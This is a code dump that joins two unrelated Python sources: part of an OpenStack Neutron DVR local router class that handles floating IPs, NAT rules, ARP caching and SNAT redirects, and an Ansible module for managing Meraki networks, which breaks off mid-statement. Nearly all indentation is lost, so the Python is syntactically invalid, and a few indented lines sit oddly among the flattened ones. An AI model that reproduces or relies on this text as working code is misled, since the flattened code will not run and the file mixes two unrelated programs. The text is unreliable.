def __init__(self, host, *args, **kwargs):
super(DvrLocalRouter, self).__init__(host, *args, **kwargs)
self.floating_ips_dict = {}
self.centralized_floatingips_set = set()
# Linklocal subnet for router and floating IP namespace link
self.rtr_fip_subnet = None
self.rtr_fip_connect = False
self.fip_ns = None
self._pending_arp_set = set()
def get_centralized_router_cidrs(self):
return self.centralized_floatingips_set
def migrate_centralized_floating_ip(self, fip, interface_name, device):
# Remove the centralized fip first and then add fip to the host
ip_cidr = common_utils.ip_to_cidr(fip['floating_ip_address'])
self.floating_ip_removed_dist(ip_cidr)
# Now add the floating_ip to the current host
self.floating_ip_added_dist(fip, ip_cidr)
def floating_forward_rules(self, fip):
"""Override this function defined in router_info for dvr routers."""
if not self.fip_ns:
return []
if fip.get(lib_constants.DVR_SNAT_BOUND):
return []
fixed_ip = fip['fixed_ip_address']
floating_ip = fip['floating_ip_address']
rtr_2_fip_name = self.fip_ns.get_rtr_ext_device_name(self.router_id)
dnat_from_floatingip_to_fixedip = (
'PREROUTING', '-d %s/32 -i %s -j DNAT --to-destination %s' % (
floating_ip, rtr_2_fip_name, fixed_ip))
snat_from_fixedip_to_floatingip = (
'float-snat', '-s %s/32 -j SNAT --to-source %s' % (
fixed_ip, floating_ip))
return [dnat_from_floatingip_to_fixedip,
snat_from_fixedip_to_floatingip]
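        # Example (illustrative): for fixed_ip 10.0.0.5 and floating_ip
        # 172.24.4.10 the returned tuples are roughly
        #   ('PREROUTING', '-d 172.24.4.10/32 -i <rtr_2_fip_name> -j DNAT --to-destination 10.0.0.5')
        #   ('float-snat', '-s 10.0.0.5/32 -j SNAT --to-source 172.24.4.10')
        # where <rtr_2_fip_name> is the router-to-FIP device name looked up above.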
def floating_mangle_rules(self, floating_ip, fixed_ip, internal_mark):
if not self.fip_ns:
return []
rtr_2_fip_name = self.fip_ns.get_rtr_ext_device_name(self.router_id)
mark_traffic_to_floating_ip = (
'floatingip', '-d %s/32 -i %s -j MARK --set-xmark %s' % (
floating_ip, rtr_2_fip_name, internal_mark))
mark_traffic_from_fixed_ip = (
'FORWARD', '-s %s/32 -j $float-snat' % fixed_ip)
return [mark_traffic_to_floating_ip, mark_traffic_from_fixed_ip]
def add_centralized_floatingip(self, fip, fip_cidr):
"""Implements floatingip in centralized network node.
This is a dummy function and is overridden in dvr_edge_router.py
to add the floatingip function to the snat namespace.
"""
def remove_centralized_floatingip(self, fip_cidr):
"""Removes floatingip from centralized network node.
This is a dummy function and is overridden in dvr_edge_router.py
to remove the floatingip function from the snat namespace.
"""
def floating_ip_added_dist(self, fip, fip_cidr):
"""Add floating IP to respective namespace based on agent mode."""
if fip.get(lib_constants.DVR_SNAT_BOUND):
floating_ip_status = self.add_centralized_floatingip(fip, fip_cidr)
if floating_ip_status == lib_constants.FLOATINGIP_STATUS_ACTIVE:
self.centralized_floatingips_set.add(fip_cidr)
return floating_ip_status
if not self._check_if_floatingip_bound_to_host(fip):
# TODO(Swami): Need to figure out what status
# should be returned when the floating IP is
# not destined for this agent and if the floating
# IP is configured in a different compute host.
# This should not happen once we fix the server
# side code, but still a check to make sure if
# the floating IP is intended for this host should
# be done.
return
floating_ip = fip['floating_ip_address']
fixed_ip = fip['fixed_ip_address']
self._add_floating_ip_rule(floating_ip, fixed_ip)
fip_2_rtr_name = self.fip_ns.get_int_device_name(self.router_id)
        # Add routing rule in the FIP namespace
fip_ns_name = self.fip_ns.get_name()
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.allocate(
self.router_id)
rtr_2_fip, __ = self.rtr_fip_subnet.get_pair()
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
device.route.add_route(fip_cidr, str(rtr_2_fip.ip))
interface_name = (
self.fip_ns.get_ext_device_name(
self.fip_ns.agent_gateway_port['id']))
ip_lib.send_ip_addr_adv_notif(fip_ns_name,
interface_name,
floating_ip)
return lib_constants.FLOATINGIP_STATUS_ACTIVE
def _add_floating_ip_rule(self, floating_ip, fixed_ip):
rule_pr = self.fip_ns.allocate_rule_priority(floating_ip)
self.floating_ips_dict[floating_ip] = rule_pr
ip_rule = ip_lib.IPRule(namespace=self.ns_name)
ip_rule.rule.add(ip=fixed_ip,
table=dvr_fip_ns.FIP_RT_TBL,
priority=rule_pr)
def _remove_floating_ip_rule(self, floating_ip):
if floating_ip in self.floating_ips_dict:
rule_pr = self.floating_ips_dict[floating_ip]
ip_rule = ip_lib.IPRule(namespace=self.ns_name)
ip_rule.rule.delete(ip=floating_ip,
table=dvr_fip_ns.FIP_RT_TBL,
priority=rule_pr)
self.fip_ns.deallocate_rule_priority(floating_ip)
#TODO(rajeev): Handle else case - exception/log?
def floating_ip_removed_dist(self, fip_cidr):
"""Remove floating IP from FIP namespace."""
if fip_cidr in self.centralized_floatingips_set:
self.remove_centralized_floatingip(fip_cidr)
self.centralized_floatingips_set.remove(fip_cidr)
return
floating_ip = fip_cidr.split('/')[0]
fip_2_rtr_name = self.fip_ns.get_int_device_name(self.router_id)
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.lookup(
self.router_id)
if self.rtr_fip_subnet:
rtr_2_fip, fip_2_rtr = self.rtr_fip_subnet.get_pair()
fip_ns_name = self.fip_ns.get_name()
self._remove_floating_ip_rule(floating_ip)
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
device.route.delete_route(fip_cidr, str(rtr_2_fip.ip))
def floating_ip_moved_dist(self, fip):
"""Handle floating IP move between fixed IPs."""
floating_ip = fip['floating_ip_address']
self._remove_floating_ip_rule(floating_ip)
self._add_floating_ip_rule(floating_ip, fip['fixed_ip_address'])
def add_floating_ip(self, fip, interface_name, device):
# Special Handling for DVR - update FIP namespace
ip_cidr = common_utils.ip_to_cidr(fip['floating_ip_address'])
return self.floating_ip_added_dist(fip, ip_cidr)
def remove_floating_ip(self, device, ip_cidr):
self.floating_ip_removed_dist(ip_cidr)
def move_floating_ip(self, fip):
self.floating_ip_moved_dist(fip)
return lib_constants.FLOATINGIP_STATUS_ACTIVE
def _get_internal_port(self, subnet_id):
"""Return internal router port based on subnet_id."""
router_ports = self.router.get(lib_constants.INTERFACE_KEY, [])
for port in router_ports:
fips = port['fixed_ips']
for f in fips:
if f['subnet_id'] == subnet_id:
return port
def _cache_arp_entry(self, ip, mac, subnet_id, operation):
"""Cache the arp entries if device not ready."""
arp_entry_tuple = Arp_entry(ip=ip,
mac=mac,
subnet_id=subnet_id,
operation=operation)
self._pending_arp_set.add(arp_entry_tuple)
def _process_arp_cache_for_internal_port(self, subnet_id):
"""Function to process the cached arp entries."""
arp_remove = set()
for arp_entry in self._pending_arp_set:
if subnet_id == arp_entry.subnet_id:
try:
state = self._update_arp_entry(
arp_entry.ip, arp_entry.mac,
arp_entry.subnet_id, arp_entry.operation)
except Exception:
state = False
if state:
# If the arp update was successful, then
# go ahead and add it to the remove set
arp_remove.add(arp_entry)
self._pending_arp_set -= arp_remove
def _delete_arp_cache_for_internal_port(self, subnet_id):
"""Function to delete the cached arp entries."""
arp_delete = set()
for arp_entry in self._pending_arp_set:
if subnet_id == arp_entry.subnet_id:
arp_delete.add(arp_entry)
self._pending_arp_set -= arp_delete
def _update_arp_entry(
self, ip, mac, subnet_id, operation, nud_state='permanent'):
"""Add or delete arp entry into router namespace for the subnet."""
port = self._get_internal_port(subnet_id)
# update arp entry only if the subnet is attached to the router
if not port:
return False
try:
# TODO(mrsmith): optimize the calls below for bulk calls
interface_name = self.get_internal_device_name(port['id'])
device = ip_lib.IPDevice(interface_name, namespace=self.ns_name)
if device.exists():
if operation == 'add':
device.neigh.add(ip, mac, nud_state=nud_state)
elif operation == 'delete':
device.neigh.delete(ip, mac)
return True
else:
if operation == 'add':
LOG.warning("Device %s does not exist so ARP entry "
"cannot be updated, will cache "
"information to be applied later "
"when the device exists",
device)
self._cache_arp_entry(ip, mac, subnet_id, operation)
return False
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception("DVR: Failed updating arp entry")
def _set_subnet_arp_info(self, subnet_id):
"""Set ARP info retrieved from Plugin for existing ports."""
# TODO(Carl) Can we eliminate the need to make this RPC while
# processing a router.
subnet_ports = self.agent.get_ports_by_subnet(subnet_id)
ignored_device_owners = (
lib_constants.ROUTER_INTERFACE_OWNERS +
tuple(common_utils.get_dvr_allowed_address_pair_device_owners()))
for p in subnet_ports:
nud_state = 'permanent' if p.get('device_owner') else 'reachable'
if p['device_owner'] not in ignored_device_owners:
for fixed_ip in p['fixed_ips']:
self._update_arp_entry(fixed_ip['ip_address'],
p['mac_address'],
subnet_id,
'add',
nud_state=nud_state)
self._process_arp_cache_for_internal_port(subnet_id)
@staticmethod
def _get_snat_idx(ip_cidr):
"""Generate index for DVR snat rules and route tables.
        The index value has to fit into 32 bits but be greater than the
        system generated entries, i.e. 32768. For IPv4, use the numeric value
        of the cidr. For IPv6, generate a crc32 hash and xor-fold it to 30
        bits. Use the freed range to extend smaller values so that they
        become greater than the system generated entries.
"""
net = netaddr.IPNetwork(ip_cidr)
if net.version == 6:
if isinstance(ip_cidr, six.text_type):
ip_cidr = ip_cidr.encode() # Needed for Python 3.x
# the crc32 & 0xffffffff is for Python 2.6 and 3.0 compatibility
snat_idx = binascii.crc32(ip_cidr) & 0xffffffff
# xor-fold the hash to reserve upper range to extend smaller values
snat_idx = (snat_idx >> 30) ^ (snat_idx & MASK_30)
if snat_idx < 32768:
snat_idx = snat_idx + MASK_30
else:
snat_idx = net.value
return snat_idx
def _delete_gateway_device_if_exists(self, ns_ip_device, gw_ip_addr,
snat_idx):
try:
ns_ip_device.route.delete_gateway(gw_ip_addr,
table=snat_idx)
except exceptions.DeviceNotFoundError:
pass
def _stale_ip_rule_cleanup(self, ns_ipr, ns_ipd, ip_version):
ip_rules_list = ns_ipr.rule.list_rules(ip_version)
snat_table_list = []
for ip_rule in ip_rules_list:
snat_table = ip_rule['table']
priority = ip_rule['priority']
if snat_table in ['local', 'default', 'main']:
continue
if (ip_version == lib_constants.IP_VERSION_4 and
snat_table in range(dvr_fip_ns.FIP_PR_START,
dvr_fip_ns.FIP_PR_END)):
continue
gateway_cidr = ip_rule['from']
ns_ipr.rule.delete(ip=gateway_cidr,
table=snat_table,
priority=priority)
snat_table_list.append(snat_table)
for tb in snat_table_list:
ns_ipd.route.flush(ip_version, table=tb)
def gateway_redirect_cleanup(self, rtr_interface):
ns_ipr = ip_lib.IPRule(namespace=self.ns_name)
ns_ipd = ip_lib.IPDevice(rtr_interface, namespace=self.ns_name)
self._stale_ip_rule_cleanup(ns_ipr, ns_ipd, lib_constants.IP_VERSION_4)
self._stale_ip_rule_cleanup(ns_ipr, ns_ipd, lib_constants.IP_VERSION_6)
def _snat_redirect_modify(self, gateway, sn_port, sn_int, is_add):
"""Adds or removes rules and routes for SNAT redirection."""
cmd = ['net.ipv4.conf.%s.send_redirects=0' % sn_int]
try:
ns_ipr = ip_lib.IPRule(namespace=self.ns_name)
ns_ipd = ip_lib.IPDevice(sn_int, namespace=self.ns_name)
for port_fixed_ip in sn_port['fixed_ips']:
# Iterate and find the gateway IP address matching
# the IP version
port_ip_addr = port_fixed_ip['ip_address']
port_ip_vers = netaddr.IPAddress(port_ip_addr).version
for gw_fixed_ip in gateway['fixed_ips']:
gw_ip_addr = gw_fixed_ip['ip_address']
if netaddr.IPAddress(gw_ip_addr).version == port_ip_vers:
sn_port_cidr = common_utils.ip_to_cidr(
port_ip_addr, port_fixed_ip['prefixlen'])
snat_idx = self._get_snat_idx(sn_port_cidr)
if is_add:
ns_ipd.route.add_gateway(gw_ip_addr,
table=snat_idx)
ns_ipr.rule.add(ip=sn_port_cidr,
table=snat_idx,
priority=snat_idx)
ip_lib.sysctl(cmd, namespace=self.ns_name)
else:
self._delete_gateway_device_if_exists(ns_ipd,
gw_ip_addr,
snat_idx)
ns_ipr.rule.delete(ip=sn_port_cidr,
table=snat_idx,
priority=snat_idx)
except Exception:
if is_add:
exc = 'DVR: error adding redirection logic'
else:
exc = ('DVR: snat remove failed to clear the rule '
'and device')
LOG.exception(exc)
def _snat_redirect_add(self, gateway, sn_port, sn_int):
"""Adds rules and routes for SNAT redirection."""
self._snat_redirect_modify(gateway, sn_port, sn_int, is_add=True)
def _snat_redirect_remove(self, gateway, sn_port, sn_int):
"""Removes rules and routes for SNAT redirection."""
self._snat_redirect_modify(gateway, sn_port, sn_int, is_add=False)
def internal_network_added(self, port):
super(DvrLocalRouter, self).internal_network_added(port)
        # NOTE: _set_subnet_arp_info should be called to dynamically
        # populate the arp entries for the dvr service ports into the
        # router namespace. It has no dependency on the external_gateway
        # port or the agent_mode.
ex_gw_port = self.get_ex_gw_port()
for subnet in port['subnets']:
self._set_subnet_arp_info(subnet['id'])
if ex_gw_port:
# Check for address_scopes here if gateway exists.
if self._check_if_address_scopes_match(port, ex_gw_port):
self._add_interface_routing_rule_to_router_ns(port)
self._add_interface_route_to_fip_ns(port)
self._snat_redirect_add_from_port(port)
def _snat_redirect_add_from_port(self, port):
ex_gw_port = self.get_ex_gw_port()
if not ex_gw_port:
return
if self._check_if_address_scopes_match(port, ex_gw_port):
# If address scopes match there is no need to cleanup the
# snat redirect rules, hence return here.
return
sn_port = self.get_snat_port_for_internal_port(port)
if not sn_port:
return
interface_name = self.get_internal_device_name(port['id'])
self._snat_redirect_add(sn_port, port, interface_name)
def _dvr_internal_network_removed(self, port):
# Clean up the cached arp entries related to the port subnet
for subnet in port['subnets']:
self._delete_arp_cache_for_internal_port(subnet)
if not self.ex_gw_port:
return
# Delete DVR address_scope static route for the removed interface
# Check for address_scopes here.
if self._check_if_address_scopes_match(port, self.ex_gw_port):
self._delete_interface_route_in_fip_ns(port)
self._delete_interface_routing_rule_in_router_ns(port)
# If address scopes match there is no need to cleanup the
# snat redirect rules, hence return here.
return
sn_port = self.get_snat_port_for_internal_port(port, self.snat_ports)
if not sn_port:
return
# DVR handling code for SNAT
interface_name = self.get_internal_device_name(port['id'])
self._snat_redirect_remove(sn_port, port, interface_name)
def internal_network_removed(self, port):
self._dvr_internal_network_removed(port)
super(DvrLocalRouter, self).internal_network_removed(port)
def get_floating_agent_gw_interface(self, ext_net_id):
"""Filter Floating Agent GW port for the external network."""
fip_ports = self.router.get(n_const.FLOATINGIP_AGENT_INTF_KEY, [])
return next(
(p for p in fip_ports if p['network_id'] == ext_net_id), None)
def get_snat_external_device_interface_name(self, port_id):
pass
def get_external_device_interface_name(self, ex_gw_port):
fip_int = self.fip_ns.get_int_device_name(self.router_id)
if ip_lib.device_exists(fip_int, namespace=self.fip_ns.get_name()):
return self.fip_ns.get_rtr_ext_device_name(self.router_id)
def enable_snat_redirect_rules(self, ex_gw_port):
for p in self.internal_ports:
if not self._check_if_address_scopes_match(p, ex_gw_port):
gateway = self.get_snat_port_for_internal_port(p)
if not gateway:
continue
internal_dev = self.get_internal_device_name(p['id'])
self._snat_redirect_add(gateway, p, internal_dev)
def disable_snat_redirect_rules(self, ex_gw_port):
for p in self.internal_ports:
if not self._check_if_address_scopes_match(p, ex_gw_port):
gateway = self.get_snat_port_for_internal_port(
p, self.snat_ports)
if not gateway:
continue
internal_dev = self.get_internal_device_name(p['id'])
self._snat_redirect_remove(gateway, p, internal_dev)
def external_gateway_added(self, ex_gw_port, interface_name):
# TODO(Carl) Refactor external_gateway_added/updated/removed to use
# super class implementation where possible. Looks like preserve_ips,
# and ns_name are the key differences.
cmd = ['net.ipv4.conf.all.send_redirects=0']
ip_lib.sysctl(cmd, namespace=self.ns_name)
self.enable_snat_redirect_rules(ex_gw_port)
for port in self.get_snat_interfaces():
for ip in port['fixed_ips']:
self._update_arp_entry(ip['ip_address'],
port['mac_address'],
ip['subnet_id'],
'add')
def external_gateway_updated(self, ex_gw_port, interface_name):
pass
def external_gateway_removed(self, ex_gw_port, interface_name):
# TODO(Carl) Should this be calling process_snat_dnat_for_fip?
self.process_floating_ip_nat_rules()
if self.fip_ns:
to_fip_interface_name = (
self.get_external_device_interface_name(ex_gw_port))
self.process_floating_ip_addresses(to_fip_interface_name)
# Remove the router to fip namespace connection after the
# gateway is removed.
self.fip_ns.delete_rtr_2_fip_link(self)
self.rtr_fip_connect = False
        # NOTE: _snat_redirect_remove should only be called when the
        # gateway is cleared, and should not be called when the gateway
        # is moved or rescheduled.
if not self.router.get('gw_port'):
self.disable_snat_redirect_rules(ex_gw_port)
def _handle_router_snat_rules(self, ex_gw_port, interface_name):
"""Configures NAT rules for Floating IPs for DVR."""
self.iptables_manager.ipv4['nat'].empty_chain('POSTROUTING')
self.iptables_manager.ipv4['nat'].empty_chain('snat')
ex_gw_port = self.get_ex_gw_port()
if not ex_gw_port:
return
ext_device_name = self.get_external_device_interface_name(ex_gw_port)
floatingips = self.get_floating_ips()
if not ext_device_name or not floatingips:
# Without router to fip device, or without any floating ip,
# the snat rules should not be added
return
# Add back the jump to float-snat
self.iptables_manager.ipv4['nat'].add_rule('snat', '-j $float-snat')
rule = self._prevent_snat_for_internal_traffic_rule(ext_device_name)
self.iptables_manager.ipv4['nat'].add_rule(*rule)
def _get_address_scope_mark(self):
# Prepare address scope iptables rule for internal ports
internal_ports = self.router.get(lib_constants.INTERFACE_KEY, [])
ports_scopemark = self._get_port_devicename_scopemark(
internal_ports, self.get_internal_device_name)
# DVR local router will use rfp port as external port
ext_port = self.get_ex_gw_port()
if not ext_port:
return ports_scopemark
ext_device_name = self.get_external_device_interface_name(ext_port)
if not ext_device_name:
return ports_scopemark
ext_scope = self._get_external_address_scope()
ext_scope_mark = self.get_address_scope_mark_mask(ext_scope)
ports_scopemark[lib_constants.IP_VERSION_4][ext_device_name] = (
ext_scope_mark)
return ports_scopemark
def _check_if_floatingip_bound_to_host(self, fip):
"""Check if the floating IP is bound to this host."""
return self.host in (fip.get('host'), fip.get('dest_host'))
def process_external(self):
if self.agent_conf.agent_mode != (
lib_constants.L3_AGENT_MODE_DVR_NO_EXTERNAL):
ex_gw_port = self.get_ex_gw_port()
if ex_gw_port:
self.create_dvr_external_gateway_on_agent(ex_gw_port)
self.connect_rtr_2_fip()
super(DvrLocalRouter, self).process_external()
def connect_rtr_2_fip(self):
if self.fip_ns.agent_gateway_port and not self.rtr_fip_connect:
ex_gw_port = self.get_ex_gw_port()
self.fip_ns.create_rtr_2_fip_link(self)
self.set_address_scope_interface_routes(ex_gw_port)
self.rtr_fip_connect = True
self.routes_updated([], self.router['routes'])
def _check_if_address_scopes_match(self, int_port, ex_gw_port):
"""Checks and returns the matching state for v4 or v6 scopes."""
int_port_addr_scopes = int_port.get('address_scopes', {})
ext_port_addr_scopes = ex_gw_port.get('address_scopes', {})
key = (
lib_constants.IP_VERSION_6 if self._port_has_ipv6_subnet(int_port)
else lib_constants.IP_VERSION_4)
# NOTE: DVR does not support IPv6 for the floating namespace yet, so
# until we fix it, we probably should use the snat redirect path for
# the ports that have IPv6 address configured.
int_port_addr_value = int_port_addr_scopes.get(str(key))
        # If the address scope of the interface is None, there is no need
        # to compare; just return.
if int_port_addr_value is None:
return False
if ((key != lib_constants.IP_VERSION_6) and
int_port_addr_scopes.get(str(key)) in
ext_port_addr_scopes.values()):
return True
return False
def _delete_interface_route_in_fip_ns(self, router_port):
rtr_2_fip_ip, fip_2_rtr_name = self.get_rtr_fip_ip_and_interface_name()
fip_ns_name = self.fip_ns.get_name()
if ip_lib.network_namespace_exists(fip_ns_name):
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
if not device.exists():
return
for subnet in router_port['subnets']:
rtr_port_cidr = subnet['cidr']
device.route.delete_route(rtr_port_cidr, str(rtr_2_fip_ip))
def _add_interface_route_to_fip_ns(self, router_port):
rtr_2_fip_ip, fip_2_rtr_name = self.get_rtr_fip_ip_and_interface_name()
fip_ns_name = self.fip_ns.get_name()
if ip_lib.network_namespace_exists(fip_ns_name):
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
if not device.exists():
return
for subnet in router_port['subnets']:
rtr_port_cidr = subnet['cidr']
device.route.add_route(rtr_port_cidr, str(rtr_2_fip_ip))
def _add_interface_routing_rule_to_router_ns(self, router_port):
ip_rule = ip_lib.IPRule(namespace=self.ns_name)
for subnet in router_port['subnets']:
rtr_port_cidr = subnet['cidr']
ip_rule.rule.add(ip=rtr_port_cidr,
table=dvr_fip_ns.FIP_RT_TBL,
priority=dvr_fip_ns.FAST_PATH_EXIT_PR)
def _delete_interface_routing_rule_in_router_ns(self, router_port):
ip_rule = ip_lib.IPRule(namespace=self.ns_name)
for subnet in router_port['subnets']:
rtr_port_cidr = subnet['cidr']
ip_rule.rule.delete(ip=rtr_port_cidr,
table=dvr_fip_ns.FIP_RT_TBL,
priority=dvr_fip_ns.FAST_PATH_EXIT_PR)
def get_rtr_fip_ip_and_interface_name(self):
"""Function that returns the router to fip interface name and ip."""
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.allocate(
self.router_id)
rtr_2_fip, __ = self.rtr_fip_subnet.get_pair()
fip_2_rtr_name = self.fip_ns.get_int_device_name(self.router_id)
return rtr_2_fip.ip, fip_2_rtr_name
def set_address_scope_interface_routes(self, ex_gw_port):
"""Sets routing rules for router interfaces if addr scopes match."""
for port in self.internal_ports:
if self._check_if_address_scopes_match(port, ex_gw_port):
self._add_interface_routing_rule_to_router_ns(port)
self._add_interface_route_to_fip_ns(port)
def create_dvr_external_gateway_on_agent(self, ex_gw_port):
fip_agent_port = self.get_floating_agent_gw_interface(
ex_gw_port['network_id'])
if not fip_agent_port:
fip_agent_port = self.agent.plugin_rpc.get_agent_gateway_port(
self.agent.context, ex_gw_port['network_id'])
LOG.debug("FloatingIP agent gateway port received from the "
"plugin: %s", fip_agent_port)
self.fip_ns.create_or_update_gateway_port(fip_agent_port)
def update_routing_table(self, operation, route):
# TODO(Swami): The static routes should be added to the
# specific namespace based on the availability of the
# network interfaces. In the case of DVR the static routes
# for local internal router networks can be added to the
# snat_namespace and router_namespace but should not be
# added to the fip namespace. Likewise the static routes
# for the external router networks should only be added to
# the snat_namespace and fip_namespace.
# The current code adds static routes to all namespaces in
# order to reduce the complexity. This should be revisited
# later.
if self.fip_ns and self.fip_ns.agent_gateway_port:
fip_ns_name = self.fip_ns.get_name()
agent_gw_port = self.fip_ns.agent_gateway_port
route_apply = self._check_if_route_applicable_to_fip_namespace(
route, agent_gw_port)
if route_apply:
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.allocate(
self.router_id)
rtr_2_fip, fip_2_rtr = self.rtr_fip_subnet.get_pair()
tbl_index = self._get_snat_idx(fip_2_rtr)
self._update_fip_route_table_with_next_hop_routes(
operation, route, fip_ns_name, tbl_index)
super(DvrLocalRouter, self).update_routing_table(operation, route)
def _update_fip_route_table_with_next_hop_routes(
self, operation, route, fip_ns_name, tbl_index):
cmd = ['ip', 'route', operation, 'to', route['destination'],
'via', route['nexthop'], 'table', tbl_index]
ip_wrapper = ip_lib.IPWrapper(namespace=fip_ns_name)
if ip_wrapper.netns.exists(fip_ns_name):
ip_wrapper.netns.execute(cmd, check_exit_code=False)
else:
LOG.debug("The FIP namespace %(ns)s does not exist for "
"router %(id)s",
{'ns': fip_ns_name, 'id': self.router_id})
def _check_if_route_applicable_to_fip_namespace(
self, route, agent_gateway_port):
ip_cidrs = common_utils.fixed_ip_cidrs(agent_gateway_port['fixed_ips'])
nexthop_cidr = netaddr.IPAddress(route['nexthop'])
for gw_cidr in ip_cidrs:
gw_subnet_cidr = netaddr.IPNetwork(gw_cidr)
# NOTE: In the case of DVR routers apply the extra routes
# on the FIP namespace only if it is associated with the
# external agent gateway subnets.
if nexthop_cidr in gw_subnet_cidr:
return True
return False
def get_router_cidrs(self, device):
"""As no floatingip will be set on the rfp device. Get floatingip from
the route of fip namespace.
"""
if not self.fip_ns:
return set()
fip_ns_name = self.fip_ns.get_name()
fip_2_rtr_name = self.fip_ns.get_int_device_name(self.router_id)
device = ip_lib.IPDevice(fip_2_rtr_name, namespace=fip_ns_name)
if not device.exists():
return set()
if self.rtr_fip_subnet is None:
self.rtr_fip_subnet = self.fip_ns.local_subnets.allocate(
self.router_id)
rtr_2_fip, _fip_2_rtr = self.rtr_fip_subnet.get_pair()
exist_routes = device.route.list_routes(
lib_constants.IP_VERSION_4, via=str(rtr_2_fip.ip))
return {common_utils.ip_to_cidr(route['cidr'])
for route in exist_routes}
def process(self):
ex_gw_port = self.get_ex_gw_port()
if ex_gw_port:
self.fip_ns = self.agent.get_fip_ns(ex_gw_port['network_id'])
self.fip_ns.scan_fip_ports(self)
super(DvrLocalRouter, self).process()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, 2019 Kevin Breit (@kbreit) <kevin.breit@kevinbreit.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: meraki_network
short_description: Manage networks in the Meraki cloud
version_added: "2.6"
description:
- Allows for creation, management, and visibility into networks within Meraki.
options:
auth_key:
description:
        - Authentication key provided by the dashboard. Required if environment variable MERAKI_KEY is not set.
state:
description:
        - Create or modify a network.
choices: [ absent, present, query ]
default: present
net_name:
description:
- Name of a network.
aliases: [ name, network ]
net_id:
description:
- ID number of a network.
org_name:
description:
- Name of organization associated to a network.
org_id:
description:
- ID of organization associated to a network.
type:
description:
- Type of network device network manages.
- Required when creating a network.
- As of Ansible 2.8, C(combined) type is no longer accepted.
- As of Ansible 2.8, changes to this parameter are no longer idempotent.
choices: [ appliance, switch, wireless ]
aliases: [ net_type ]
type: list
tags:
type: list
description:
- List of tags to assign to network.
- C(tags) name conflicts with the tags parameter in Ansible. Indentation problems may cause unexpected behaviors.
        - Ansible 2.8 converts this to a list from a comma separated string.
timezone:
description:
- Timezone associated to network.
- See U(https://en.wikipedia.org/wiki/List_of_tz_database_time_zones) for a list of valid timezones.
disable_my_meraki:
description: >
            - Disables the local device status pages (U(my.meraki.com), U(ap.meraki.com), U(switch.meraki.com),
              U(wired.meraki.com))
type: bool
version_added: '2.7'
author:
- Kevin Breit (@kbreit)
extends_documentation_fragment: meraki
'''
EXAMPLES = r'''
- name: List all networks associated to the YourOrg organization
meraki_network:
auth_key: abc12345
state: query
org_name: YourOrg
delegate_to: localhost
- name: Query network named MyNet in the YourOrg organization
meraki_network:
auth_key: abc12345
state: query
org_name: YourOrg
net_name: MyNet
delegate_to: localhost
- name: Create network named MyNet in the YourOrg organization
meraki_network:
auth_key: abc12345
state: present
org_name: YourOrg
net_name: MyNet
type: switch
timezone: America/Chicago
tags: production, chicago
delegate_to: localhost
- name: Create combined network named MyNet in the YourOrg organization
meraki_network:
auth_key: abc12345
state: present
org_name: YourOrg
net_name: MyNet
type:
- switch
- appliance
timezone: America/Chicago
tags: production, chicago
delegate_to: localhost
'''
RETURN = r'''
data:
description: Information about the created or manipulated object.
returned: info
type: complex
contains:
id:
description: Identification string of network.
returned: success
type: str
sample: N_12345
name:
description: Written name of network.
returned: success
type: str
sample: YourNet
organizationId:
description: Organization ID which owns the network.
returned: success
type: str
sample: 0987654321
tags:
description: Space delimited tags assigned to network.
returned: success
type: str
sample: " production wireless "
timeZone:
description: Timezone where network resides.
returned: success
type: str
sample: America/Chicago
type:
description: Functional type of network.
returned: success
type: str
sample: switch
disableMyMerakiCom:
description: States whether U(my.meraki.com) and other device portals should be disabled.
returned: success
type: bool
sample: true
'''
import os
from ansible.module_utils.basic import AnsibleModule, json, env_fallback
from ansible.module_utils.urls import fetch_url
from ansible.module_utils._text import to_native
from ansible.module_utils.network.meraki.meraki import MerakiModule, meraki_argument_spec
def is_net_valid(data, net_name=None, net_id=None):
if net_name is None and net_id is None:
return False
for n in data:
if net_name:
if n['name'] == net_name:
return True
elif net_id:
if n['id'] == net_id:
return True
return False
def construct_tags(tags):
formatted_tags = ' '.join(tags)
return ' {0} '.format(formatted_tags) # Meraki needs space padding
def list_to_string(data):
new_string = str()
for i, item in enumerate(data):
        if i == len(data) - 1:
            new_string += str(item)
else:
new_string = "{0}{1} ".format(new_string, item)
return new_string.strip()
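# Illustrative behaviour of the helpers above (values are examples only):
#   construct_tags(['production', 'chicago']) -> ' production chicago '
#   list_to_string(['switch', 'appliance'])   -> 'switch appliance'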
def main():
# define the available arguments/parameters that a user can pass to
# the module
argument_spec = meraki_argument_spec()
argument_spec.update(
net_id=dict(type='str'),
type=dict(type='list', choices=['wireless', 'switch', 'appliance'], aliases=['net_type']),
tags=dict(type='list'),
timezone=dict(type='str'),
net_name=dict(type='str', aliases=['name', 'network']),
state=dict(type='str', choices=['present', 'query', 'absent'], default='present'),
disable_my_meraki=dict(type='bool'),
)
# the AnsibleModule object will be our abstraction working with Ansible
# this includes instantiation, a couple of common attr would be the
# args/params passed to the execution, as well as if the module
# supports check mode
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=False,
)
meraki = MerakiModule(module, function='network')
module.params['follow_redirects'] = 'all'
payload = None
create_urls = {'network': '/organizations/{org_id}/networks'}
update_urls = {'network': '/networks/{net_id}'}
delete_urls = {'network': '/networks/{net_id}'}
meraki.url_catalog['create'] = create_urls
meraki.url_catalog['update'] = update_urls
meraki.url_catalog['delete'] = delete_urls
if not meraki.params['org_name'] and not meraki.params['org_id']:
meraki.fail_json(msg='org_name or org_id parameters are required')
if meraki.params['state'] != 'query':
if not meraki.params['net_name'] and not meraki.params['net_id']:
meraki.fail_json(msg='net_name or net_id is required for present or absent states')
if meraki.params['net_name'] and meraki.params['net_id']:
